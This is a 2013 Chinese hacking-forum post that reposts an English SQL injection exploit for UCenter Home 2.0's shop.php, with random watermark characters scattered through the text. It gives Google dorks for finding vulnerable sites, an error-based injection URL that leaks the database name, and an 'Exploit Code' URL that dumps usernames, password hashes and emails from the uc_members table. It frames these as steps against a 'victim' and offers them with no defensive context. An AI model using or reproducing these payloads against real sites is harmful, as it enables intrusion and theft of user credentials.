找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2018|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
4 q8 N3 y7 D+ p7 I% X5 v, j' T
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  " Y" h2 T+ c- Q" f/ g0 ^% t  h5 ^! v  R
1 U( m6 {# G& u% k: B
                                 % j! B# P( R5 {

" {( Q  |% I. c* F3 g" M*/ Author : KnocKout  
% d) {" ?9 u$ x2 d4 F* O7 K8 y  c1 n$ e
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  1 Z% z- i6 a1 ~; t/ s

- [5 [; s& G/ S*/ Contact: knockoutr@msn.com  % t% A+ ^" N6 O; t5 M
/ s4 N- v; a& E( W( z6 Z" _7 x! J
*/ Cyber-Warrior.org/CWKnocKout  * [3 {, _  p* h$ S% S% u6 t" ]  a

& g7 d6 w$ t& E% H( v__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  & w+ ~+ ^" X2 [" _

3 o# K# I2 K! C2 M' K4 Q% ?2 ZScript : UCenter Home  9 [5 L2 Q7 C  X& j

+ q$ Y) i9 r; A7 J  j7 IVersion : 2.0  
$ s6 M' E/ }& P( e* R! F2 t
2 o/ Y7 n( S: U; o' k; ?5 t" [. uScript HomePage : http://u.discuz.net/  0 @; X1 m1 t: H# N4 G4 y( R

$ t& l" _$ X/ c! e9 X$ h% q__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  5 x9 b+ t5 I/ V! u$ K/ F' S1 |

) x" l7 T0 f3 H9 U! ^Dork : Powered by UCenter inurl:shop.php?ac=view  
/ w3 N+ {; \0 m# r" _/ c; W) g1 d$ d  n
Dork 2 : inurl:shop.php?ac=view&shopid=  
+ }6 ?' T7 M; a  `# \# o
4 l$ |" s; M" \__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
+ J3 c2 K0 O  @5 _; I$ s4 Z) Z9 T" c5 w. F! i, L: `
Vuln file : Shop.php  & h. w( f- g" E- b1 I' l2 f/ z

6 c( K% I7 \! q9 ~8 Yvalue's : (?)ac=view&shopid=  
' q# t/ V! v3 }: `. t$ Q4 m0 K, v
Vulnerable Style : SQL Injection (MySQL Error Based)  
; D2 C4 _; {! H& m9 w+ U) d9 p: ~  X1 K. ]; x( i- g% f
Need Metarials : Hex Conversion  
% S- N' R; G# A) A$ c
: }$ Y+ w) t1 O2 a" e6 b__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
0 o; T2 Z3 Z0 p$ ~2 g" Z% M, B$ c
' Q& |4 @3 e, r+ C- EYour Need victim Database name.   
' o, d" l2 ^$ A. w6 ]2 ^1 i4 o+ `5 U! T+ `$ @( _9 G, ?: E
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  & R, g% d  q' s# d, i2 r

/ [3 K5 F: s9 L! J; Z1 g/ Q9 c/ H  S..  
, d7 s1 N$ Y" I. f8 ^1 ~: d
7 V* A9 h4 j0 ]DB : Okey.  ( q, V8 [  T- ^9 I- f! q! [4 c0 A/ O

9 _) J  M: l" A) w* u4 Q2 j8 lyour edit DB `[TARGET DB NAME]`  & S+ a) A  s+ i
/ y* E0 ?7 B$ F
Example : 'hiwir1_ucenter'  : k4 Y( \9 [; K; C% w

8 c# I, }* T# ^$ R- eEdit : Okey.  # j7 @! H2 t" Q, b6 h+ ?, J+ E

+ v* J# |2 d0 `- G" M5 [3 UYour use Hex conversion. And edit Your SQL Injection Exploit..  " O9 K, P* o: H# n& c  `" z2 a
9 _1 P# L) ]/ a
   ! V) d# c) L3 C' }6 C! l

( p' t4 G4 |3 v. X1 QExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  + W* n, A3 P! ^/ L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表